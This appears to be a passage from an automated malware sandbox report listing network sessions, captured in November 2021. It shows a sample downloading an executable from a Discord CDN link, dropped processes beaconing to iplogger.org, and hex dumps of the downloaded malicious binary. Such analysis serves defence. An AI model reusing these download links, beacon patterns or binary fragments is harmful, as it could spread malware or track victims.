                                                                                                                                                                                Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                                                                                                                                                                                Nov 11, 2021 12:27:34.566529989 CET27341INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                                                                                                                                                                                Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                49192.168.2.54986888.99.66.3180C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:35.122633934 CET27341OUTGET /1fEwd7 HTTP/1.1
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                MySpecialHeder: whatever
                                                                                                                                                                                User-Agent: Run
                                                                                                                                                                                Host: iplogger.org
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Cookie: clhf03028ja=102.129.143.91
                                                                                                                                                                                Nov 11, 2021 12:27:35.144159079 CET27342INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:35 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Location: https://iplogger.org/1fEwd7
                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                Last-Modified: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                5192.168.2.549785104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                6192.168.2.54978652.216.1.8443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                7192.168.2.549794162.159.135.233443C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                8192.168.2.549795104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                9192.168.2.549803104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                0192.168.2.549765162.159.129.233443C:\Users\user\Desktop\We7WnoqeXe.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:26:04 UTC0OUTGET /attachments/878034206570209333/907977083509145650/vms.exe HTTP/1.1
                                                                                                                                                                                Host: cdn.discordapp.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:26:04 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:04 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 2776885
                                                                                                                                                                                Connection: close
                                                                                                                                                                                CF-Ray: 6ac729ddd830691f-FRA
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Age: 80887
                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                Content-Disposition: attachment;%20filename=vms.exe
                                                                                                                                                                                ETag: "2bc350586fbde00fff7707d69c30941f"
                                                                                                                                                                                Expires: Fri, 11 Nov 2022 11:26:04 GMT
                                                                                                                                                                                Last-Modified: Wed, 10 Nov 2021 12:56:46 GMT
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                x-goog-generation: 1636549006252556
                                                                                                                                                                                x-goog-hash: crc32c=gZS2qA==
                                                                                                                                                                                x-goog-hash: md5=K8NQWG+94A//dwfWnDCUHw==
                                                                                                                                                                                x-goog-metageneration: 1
                                                                                                                                                                                x-goog-storage-class: STANDARD
                                                                                                                                                                                x-goog-stored-content-encoding: identity
                                                                                                                                                                                x-goog-stored-content-length: 2776885
                                                                                                                                                                                X-GUploader-UploadID: ADPycdt4lu0jSp9srJRrX8L-llrqRscbkIP8c_zq4DCnFnsrTV6Nm625z0kQnWTqCa8_BT-cqMHZB-t8cnBTIPbyZSs
                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                2021-11-11 11:26:04 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 4b 34 7a 68 56 74 46 61 54 54 45 35 4e 42 53 37 57 25 32 46 65 51 53 38 72 38 52 4d 69 44 6d 47 62 4f 68 79 69 53 25 32 46 42 6f 77 6a 74 6d 47 6b 6b 6a 5a 56 6d 25 32 42 6a 63 68 44 38 67 36 66 4a 65 74 36 76 4e 5a 50 77 31 68 52 54 36 67 75 30 73 77 47 4b 6a 4f 64 66 4c 5a 63 35 57 76 4b 4b 45 72 6c 65 47 6d 6c 76 25 32 46 47 78 49 46 5a 36 4c 78 4f 41 50 43 4e 56 36 47 4b 4b 75 36 6e 77 61 53 71 71 73 57 34 4f 38 45 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65
                                                                                                                                                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K4zhVtFaTTE5NBS7W%2FeQS8r8RMiDmGbOhyiS%2FBowjtmGkkjZVm%2BjchD8g6fJet6vNZPw1hRT6gu0swGKjOdfLZc5WvKKErleGmlv%2FGxIFZ6LxOAPCNV6GKKu6nwaSqqsW4O8EQ%3D%3D"}],"group":"cf-nel","max_age
                                                                                                                                                                                2021-11-11 11:26:04 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e1 c3 c9 b8 a5 a2 a7 eb a5 a2 a7 eb a5 a2 a7 eb fe ca a4 ea af a2 a7 eb fe ca a2 ea 3a a2 a7 eb fe ca a3 ea b7 a2 a7 eb 70 cf a3 ea b7 a2 a7 eb 70 cf a4 ea b7 a2 a7 eb 70 cf a2 ea 8c a2 a7 eb fe ca a6 ea aa a2 a7 eb a5 a2 a6 eb 3a a2 a7 eb 3e cc ae ea a4 a2 a7 eb 3e cc 58 eb a4 a2 a7 eb 3e cc a5 ea a4 a2 a7 eb 52 69 63 68 a5 a2 a7 eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:ppp:>>X>Rich
                                                                                                                                                                                2021-11-11 11:26:04 UTC2INData Raw: fb 3d 41 ca 96 dd 9e a1 7e 99 90 9f 2b a3 60 b5 65 b1 38 9d f1 04 9e 3e 83 ae 6a ca ab 88 f3 19 6e 9e e1 3f 40 24 19 5e f5 63 bd 78 90 d1 f4 6f d9 31 ec a3 71 9b 2a 6c e9 f9 80 bf 91 39 e5 60 fe 3d c3 1f 83 fb 0a 38 b1 d1 2c 6e 41 b5 19 7b a9 39 25 b8 db 7b c8 47 69 a9 18 65 28 a4 98 df 35 fb ca 3e 44 d1 c4 2f 43 e9 9e 6e 5e 60 96 bf 82 ab aa 6d 41 aa f8 7b 2b c9 e0 53 7e 99 c1 9f 41 a3 35 60 31 d5 c0 6f f9 31 2c a4 a9 ed 19 30 45 a5 c0 af d9 99 d8 a3 40 24 25 b8 d1 9e 4a 40 b1 ad 20 1e 89 51 e1 b9 de 9e 60 52 1b 99 32 e2 41 99 9e e6 fe b6 79 91 43 23 17 5e f3 31 b9 37 90 fb af 1e 31 a9 ea c9 c1 a9 b8 64 28 a4 98 df 35 f8 ca 27 38 fb 40 65 93 44 4b 18 f1 ef c4 71 9d 19 25 18 e9 a9 e2 14 d9 3d e0 51 69 11 df 67 ac 29 2c da 40 ec 90 31 4a 5b 31 6e 69 b7 19
                                                                                                                                                                                Data Ascii: =A~+`e8>jn?@$^cxo1q*l9`=8,nA{9%{Gie(5>D/Cn^`mA{+S~A5`1o1,0E@$%J@ Q`R2AyC#^171d(5'8@eDKq%=Qig),@1J[1ni
                                                                                                                                                                                2021-11-11 11:26:04 UTC4INData Raw: 55 e5 ae 9c b9 a7 e6 fc 45 b9 34 06 52 78 2a 9f c5 41 03 b5 56 a3 83 8a ef c4 bc bc 6c ee d3 44 d9 93 7e ec 45 1e a1 61 ee 6b 77 ec c2 5d a7 af 3d a3 7e b8 24 85 d6 e2 e9 9e 37 b1 9a 46 8f 1c b3 d6 f5 d3 f2 88 1e 2a 4f 17 7b a1 30 49 f0 59 b8 60 83 83 8b 0e ca 2d 74 11 f0 01 68 d1 77 23 fd dd 08 55 ee 98 37 f2 75 db 77 cb eb db bf be 28 25 87 48 96 2d 6e 42 2e 21 64 2a fa 74 5e 62 ca de 79 d7 4b a7 0d 32 7f 9d 05 b3 c2 75 07 60 6e 6f be b6 55 81 d6 36 13 5e 9e 1e a8 e5 ef 47 b6 68 e1 67 cd a3 be 84 55 58 a9 51 33 a5 a0 e2 31 9f 76 32 7e a6 45 03 b9 b3 3f 95 69 ed 74 4f
                                                                                                                                                                                Data Ascii: UE4Rx*AVlD~Eakw]=~$7F*O{0IY`-thw#U7uw(%H-nB.!d*t^byK2u`noU6^GhgUXQ31v2~E?itO
                                                                                                                                                                                2021-11-11 11:26:04 UTC4INData Raw: c4 76 0d 6f cb d8 9a 51 99 e2 3c e8 f8 cb 38 2f ee a1 ad 45 e7 a8 78 9f 33 89 be 35 0b 6e 07 95 73 d6 2e ad 70 79 00 01 9d 7f 3f d3 51 45 a2 06 3b cd 2b 8a a0 14 af af d1 91 3b 47 55 9b 21 64 0e 96 4f 83 2e 15 ee 68 e5 99 6a 8b 98 1a 6b 67 36 7e 36 2e 98 44 b1 01 2e 15 b9 5d 99 1b 12 05 ce 2a 3e 38 64 e7 79 33 f8 90 03 8b 51 44 21 4c 9b 8c 17 f3 55 60 c6 33 7b 5c 75 8a bf 29 7d 96 47 66 34 f2 bd 58 ff dc a5 90 f9 bf b1 83 d3 a8 b1 d1 78 72 bd e3 17 73 13 20 2b b0 30 f2 cb 05 a6 31 bb 5b 44 fe 6f 57 7e b0 25 54 41 a6 3b ab a6 20 75 a1 07 28 8c d8 94 e1 e2 46 a9 b1 1e 15 c6 b2 79 2c a2 90 62 ab 88 f4 b1 42 49 b5 b3 f3 dc 40 71 e5 ed 25 bd a7 cd e1 61 33 8c f4 05 44 bd a8 b3 ba d6 48 e1 63 10 25 4d 8f 71 93 c6 0b fb 41 52 19 9f 8b 18 1d a9 38 22 11 be ee 1f
                                                                                                                                                                                Data Ascii: voQ<8/Ex35ns.py?QE;+;GU!dO.hjkg6~6.D.]*>8dy3QD!LU`3{\u)}Gf4Xxrs +01[DoW~%TA; u(Fy,bBI@q%a3DHc%MqAR8"
                                                                                                                                                                                2021-11-11 11:26:04 UTC5INData Raw: d1 39 b4 2f e1 9b 22 88 13 af 93 a2 29 e7 9b b6 25 e1 5d e9 90 9d cd f6 75 5c a7 99 c0 45 a1 80 7a f5 d7 8b b2 96 b8 f5 92 77 b5 f1 cd 23 1b 69 9e 19 f1 90 b0 7c c9 99 ed 07 09 b6 66 61 13 c5 58 01 fd c9 20 46 29 e6 93 26 a2 49 8b bf 8a 9d 7a 86 79 b8 1a ad bc 9d c2 66 1d 63 1d 1f a2 6f 77 bc c5 ae 7d 11 5a 9b d2 18 0a 62 75 a2 41 d6 44 b8 c0 b1 c4 7d 29 f9 c2 81 c1 06 60 25 c0 1d fa 66 20 81 9f 63 20 99 7b 78 a3 76 b0 56 03 01 aa 3c 34 5d 22 a9 c3 0e 9e a3 73 03 81 99 89 e9 28 42 8f 45 ea 3a 90 38 32 a5 75 25 60 91 99 d3 b6 03 f2 b5 d0 a6 91 72 1b 66 41 99 9d 20 1a eb e4 1a c7 1e a5 52 51 ce c3 f8 ed 0d 55 f8 0e 98 13 66 20 6d 6d bc 89 69 6b 86 80 31 fc 13 3d c7 74 a2 ae aa 44 b8 0d 80 c0 62 90 22 8d af fb 8d 92 2c 37 75 67 8b d3 f0 a2 58 40 e9 b9 6f 59
                                                                                                                                                                                Data Ascii: 9/")%]u\Ezw#i|faX F)&Izyfcow}ZbuAD})`%f c {xvV<4]"s(BE:82u%`rfA RQUf mmik1=tDb",7ugX@oY
                                                                                                                                                                                2021-11-11 11:26:04 UTC6INData Raw: 12 2a 7f 0e 9a 70 f3 a1 d2 f7 5a a3 37 c3 2d c1 8b eb c7 94 3c 3b 69 11 bd 39 1e db d3 d1 61 09 fe c8 3e 79 66 95 73 db 13 2b 9e 09 f2 07 dd 08 05 18 4e e5 d9 b4 6d c3 d3 89 23 16 d8 a2 a2 14 e5 20 e0 1c 22 ea 55 10 01 09 ce 04 f7 fb 95 1c f2 f4 ee 48 ef 11 e1 0d fc 89 b1 2e 13 fc 36 95 17 c1 31 b1 6f 01 02 9b d5 25 23 49 18 40 99 10 47 f3 69 c1 73 f3 59 55 ce 8a 05 12 7e 2c 07 10 4d 39 5a 10 fc ad 8a 80 ce 76 dc 9c ad 99 0c 6b ac 66 e7 f8 33 0e 3b 88 8f fb 63 57 e6 09 1b c7 72 bb 01 df ff 13 37 e0 b6 17 73 d5 33 a0 a6 49 c0 ae bc 3c d4 62 78 07 7b 66 6b b4 59 5d 11 67 a9 23 19 e3 ba 25 18 18 b5 fa 85 c1 67 11 f6 54 92 d2 c2 d0 8f 03 b3 7d 2f 4a 40 3b 3f 38 9d cd 1f 3a 86 e0 88 a1 79 1d fa 92 6c a6 62 d3 92 8e cd b2 49 d0 db 77 64 f0 cc 92 13 98 f8 0e e2
                                                                                                                                                                                Data Ascii: *pZ7-<;i9a>yfs+Nm# "UH.61o%#I@GisYU~,M9Zvkf3;cWr7s3I<bx{fkY]g#%gT}/J@;?8:ylbIwd
                                                                                                                                                                                2021-11-11 11:26:04 UTC8INData Raw: c2 6e bf 03 cd 72 a1 ac 4a 31 6b e7 d5 6f 89 6f e2 ca 1d 57 98 99 24 bd b0 98 e5 5c 4b df f8 6b 28 10 62 cb 45 b1 18 34 7c 99 2a d6 f5 b5 f6 63 85 8b 90 c7 c6 15 28 b1 e8 fb d8 06 18 6b ca ae af eb 50 f1 25 1d ee 54 41 74 79 4f f4 08 bb 00 27 71 93 e0 11 78 56 8b ea fd be 02 e4 a9 7d ee 9e a8 41 56 51 83 d3 ab f1 61 a5 ad 81 36 d2 f9 02 c4 44 0b b5 3c fe a8 9c a5 c4 08 41 55 b4 6a 53 77 1e b8 d2 32 bc 52 41 b5 18 9b e4 49 f3 0f 40 a3 68 1d e9 f9 3a 05 f0 87 c7 66 b9 c8 63 e8 01 42 61 1d f2 d3 c4 ef 32 57 de 1e d0 b3 38 17 e9 bb 14 e8 a9 68 e0 07 b1 e7 50 e9 51 f0 fe ae d4 bd 48 80 ab 64 6c 3b 03 cd e0 83 fc 45 26 ad 4a 8e fe 73 81 3f eb a1 fc 41 8e 62 67 33 25 77 ac af ba 8d c5 07 24 60 ff b0 4d 3a 52 78 df 0b b7 90 62 77 59 cb c8 fe 7c 06 ea 5b 53 bd 43
                                                                                                                                                                                Data Ascii: nrJ1kooW$\Kk(bE4|*c(kP%TAtyO'qxV}AVQa6D<AUjSw2RAI@h:fcBa2W8hPQHdl;E&Js?Abg3%w$`M:RxbwY|[SC
                                                                                                                                                                                2021-11-11 11:26:04 UTC9INData Raw: 1a 91 a7 27 b8 4b 0d 89 48 33 56 3a 78 a3 05 e4 6a bb f6 b2 9a f0 23 2b 86 fe 50 c6 c3 c6 51 69 ff 5d 5a ce ad 43 4c 69 75 a2 f3 81 09 53 f8 67 e3 47 93 99 df 28 6b 29 60 40 23 51 8a 0c f8 42 4d fa 9c f3 45 37 91 ef 57 5f 39 56 ff 0d 9d 33 7d 03 6f 29 0d 4f bc 01 ac cb 8c e3 d3 80 80 2c 8e fa 27 bb 14 7d 43 e0 e6 95 97 f7 09 08 c7 c6 25 84 4e 20 52 37 5a 59 3e 3d 56 21 35 ea db 8f 70 25 88 43 92 0d 08 e9 7f 5f 0d bd cb a3 7e 97 a9 d1 0b a9 ef 09 6d c0 ec 18 16 5e ff 48 6f d7 29 ed 6f 79 3c 19 fd 15 60 55 4c 41 05 60 02 b4 2a e1 d8 77 90 cf 3c d4 33 1a 63 53 ca 65 c6 56 eb 79 62 64 cd 95 f7 81 ca a7 a9 91 b4 05 a3 21 7c 21 34 e7 f0 7e cf dd 01 90 e7 14 02 27 9b fe 91 13 b5 f7 bb 14 7e 69 9d f9 2d 3a d1 64 6d 51 e2 9a 01 69 39 2d 80 4f e4 94 f3 33 4c 9e 50
                                                                                                                                                                                Data Ascii: 'KH3V:xj#+PQi]ZCLiuSgG(k)`@#QBME7W_9V3}o)O,'}C%N R7ZY>=V!5p%C_~m^Ho)oy<`ULA`*w<3cSeVybd!|!4~'~i-:dmQi9-O3LP
                                                                                                                                                                                2021-11-11 11:26:04 UTC11INData Raw: ff 3d e3 b4 24 cb d5 ff c3 c0 90 55 95 00 e9 35 93 e7 bb 37 df 35 a5 eb 4e 17 a6 f0 f3 b6 47 e9 85 f3 f0 b9 b9 3d c9 dc f1 20 7b 85 f4 1e df be 1b e5 10 cd 1d c0 dd 6a 79 ab df 92 f8 b5 45 fb 0b e9 67 66 03 28 7f 0f ec a3 a5 99 24 c7 b0 13 6a 66 55 3d dd 17 f3 14 c0 63 aa b3 41 15 db 56 8f 75 c8 df a2 b3 d1 5d d7 f0 91 9d 1d e1 01 86 6f 34 e8 09 d1 5a 75 df 7a 11 58 d5 f3 6f 5e 41 f2 51 e9 ef 42 b0 38 62 3c 3d e4 4a 10 50 45 0e 89 a8 10 e3 b5 50 86 d1 82 29 2f ac 04 be 5c cd 30 d1 eb 35 3d 77 82 80 26 97 12 41 3d 99 29 e7 40 eb 00 a0 91 5b 11 94 ad ef 5d 4b 7d d0 88 ee 7d 61 4f 96 f1 ef 50 01 05 06 35 aa b3 de b0 5a 15 94 10 72 a8 61 4c 71 48 6d 2d ab ed 1b b9 cd ee 94 37 3b bd ca a4 fd 79 ad f0 65 e2 24 92 c3 a4 1b 2d 70 6c 16 f4 fd ec da 04 fe 24 26 68
                                                                                                                                                                                Data Ascii: =$U575NG= {jyEgf($jfU=cAVu]o4ZuzXo^AQB8b<=JPEP)/\05=w&A=)@[]K}}aOP5ZraLqHm-7;ye$-pl$&h
                                                                                                                                                                                2021-11-11 11:26:04 UTC12INData Raw: 6f e4 99 1b 99 aa 12 31 fd dc 49 1d 18 0c c4 ac aa 05 ab 85 24 75 c7 c1 7e f5 ef 24 c7 17 c5 8c 92 49 6f 71 fa 43 ec 20 1f 05 c3 e2 89 39 39 88 e8 37 2f 24 27 4d 54 25 a8 05 35 b7 f8 91 f6 78 7a 28 6d 61 ab 5d d1 0d 2d e0 ad 8f e5 6e 05 99 ac 0e 11 7a ee 41 c4 59 7b 35 fa d8 13 dc 48 e4 a3 8b 42 e3 b5 9d 1d b8 0a 19 94 50 a0 ea e9 cd 62 13 3e 3e 2e fc 1d 2d e9 53 70 a6 57 e6 2b 10 2f c0 01 c0 2b 43 69 18 fa c5 c4 e6 83 63 32 16 bc a0 a6 b2 18 a8 d1 6f 7f fb 04 dc 9f 60 11 76 ac d3 92 12 65 62 38 4d fe 81 da 6c ec c8 ba f7 16 fd 21 63 ce ea a9 52 ec 0e b1 4d 0a a8 b4 19 6b 7c 53 60 48 91 57 ec 78 44 8d 98 ac f2 3b 79 c7 0d 18 1f 62 a6 92 61 6a 01 fc 6c 53 17 a3 df 3d bd 5d d2 ef f4 30 58 93 72 de 25 5d 20 41 67 e2 b4 fc 8a 61 36 6f b2 b2 33 61 40 9c e5 e9
                                                                                                                                                                                Data Ascii: o1I$u~$IoqC 997/$'MT%5xz(ma]-nzAY{5HBPb>>.-SpW+/+Cic2o`veb8Ml!cRMk|S`HWxD;ybajlS=]0Xr%] Aga6o3a@
                                                                                                                                                                                2021-11-11 11:26:04 UTC13INData Raw: 85 49 28 78 37 94 45 fd d6 21 99 2f a9 36 5e 49 47 3d ca 35 1f 66 c2 bd 3d 55 e2 21 bc 71 29 e6 85 cb 40 2a 00 9e 37 8b 88 e2 fb 53 9b 0c 3f e6 a8 7b 7f fe bb 7d d1 19 f8 70 8b ba 55 a9 89 1a 97 67 da 35 ba f5 94 1a 91 5b f2 85 e3 00 e4 e9 06 80 07 df 31 e7 23 c4 b5 b8 f2 68 d7 29 18 78 62 be 6b 52 f1 1d 34 3d 51 36 c4 48 4e 36 6a f8 60 3d 73 93 d5 13 07 71 a5 8c 8e bf 5c 58 25 ee 54 8b aa be 93 9f 9e 0f 90 6b 11 78 e2 99 f5 52 f1 44 66 fc f0 b8 5f 18 b9 02 57 1b 53 e3 ae 5e 1e 7c d1 c7 18 1d 1a 2f 18 29 92 6f 9b 12 4b bf 7c 90 5e b2 6b 0e b9 88 16 4a 41 1f 98 d1 89 52 de 83 58 64 99 ff 9c c6 35 be 91 ba cb 75 d4 bb b4 82 d8 4f ff 95 16 ae 11 8c 68 c6 e5 ad a4 87 41 6e e0 5a 88 d3 89 ea 44 31 d9 56 a0 b0 bb 1f a9 45 2a 90 6c 51 e4 e6 5d ab 8e 97 e1 f9 68
                                                                                                                                                                                Data Ascii: I(x7E!/6^IG=5f=U!q)@*7S?{}pUg5[1#h)xbkR4=Q6HN6j`=sq\X%TkxRDf_WS^|/)oK|^kJARXd5uOhAnZD1VE*lQ]h
                                                                                                                                                                                2021-11-11 11:26:04 UTC15INData Raw: ea 49 d8 98 a2 70 c5 b8 46 40 eb 92 f8 50 1c a8 dd 30 1d 64 e6 f6 df 2c 5c 92 12 f2 c7 50 d6 dc 7d 91 29 f7 5c ef b6 32 3b 13 6d 99 bc 72 e2 48 64 11 44 dc 2b 12 8d 1c 09 bf 56 92 a7 3c a1 e8 2c 1b 1b 6a 99 6a 81 95 23 e0 6b 80 89 85 be 3d db 13 03 6e c8 ea ea 1c 8d e1 a1 25 4e ed 63 ad a7 45 2f 8b 17 d1 c7 c0 d8 0f 71 1c 7d 00 54 4b 02 31 97 ae 45 0b d0 4f 96 9c 4e 8d a9 a3 23 39 0d a9 0d f4 bd 7a 1c a6 a8 70 36 60 37 c2 5a b0 6f c5 35 fb f8 1d 97 48 1a 7d 1d 05 f2 d2 de 12 e1 88 e2 3e 36 1e d5 6f 2b 47 1f 47 af 15 18 69 d9 74 8c f8 3d c5 a6 38 76 ea 47 84 d6 a1 45 0c f6 60 24 11 11 25 0b c9 59 5e fe fa f5 d8 a2 81 e9 e5 aa 5c 97 5f e3 9e 84 e6 e1 a0 de 98 9b 7a d1 25 c2 bf cf 8c fd ce 73 c7 60 d2 fb c4 89 5d 51 c9 4f a8 31 70 93 37 9e bc 87 1e 2d 75 80
                                                                                                                                                                                Data Ascii: IpF@P0d,\P})\2;mrHdD+V<,jj#k=n%NcE/q}TK1EON#9zp6`7Zo5H}>6o+GGit=8vGE`$%Y^\_z%s`]QO1p7-u
                                                                                                                                                                                2021-11-11 11:26:04 UTC16INData Raw: 5f 7a 00 86 88 ed f6 e8 7c cf 2d 98 d0 a8 67 ff 3d 6d ab e8 6b 1f d6 ba 64 1f 67 ff c1 71 df fb 3f 1f 04 ba b2 1e 7d fb bf 83 dd e2 20 ea e2 7a 34 53 f1 ce bf 68 2d 25 fe 3b fd fb 37 76 bc 2b df f8 a6 a7 0e 67 39 fd d9 19 f5 ae af 67 9b 33 96 07 cb a2 3c a1 6e 19 d0 3b 40 4e d7 ac cb 25 99 64 ea a4 a8 f6 83 fd ad 2a f7 c2 01 5c 8f 49 40 54 3e 5c 5e ec 78 9a 0d 08 0f 02 59 38 44 f8 ad 6f ec ca 81 7e 9c a3 91 c8 9d 18 8a 33 c8 6c 72 6d b3 79 47 b3 9c 9f 31 9c 8f ec 0c 16 93 31 f9 af 5c 2d 13 bc 29 9b d2 92 6c 5d 56 ae 40 59 dc 01 16 d4 2c 64 29 27 dc f2 f4 04 1e b3 3d e4 2c 5e 93 5d a6 8c cd ff d1 e0 48 fd 61 c2 f2 68 e6 65 cf 9d 3a dc 4f a8 ab 3e 6e 49 d8 80 cd 36 d1 fb 3d 33 86 75 9f 1d 13 6c e9 33 fd 1e ed dd a8 0e 59 bc 68 f8 f3 69 c0 d6 ab 46 2f 7d 85
                                                                                                                                                                                Data Ascii: _z|-g=mkdgq?} z4Sh-%;7v+g9g3<n;@N%d*\I@T>\^xY8Do~3lrmyG11\-)l]V@Y,d)'=,^]Hahe:O>nI6=3ul3YhiF/}
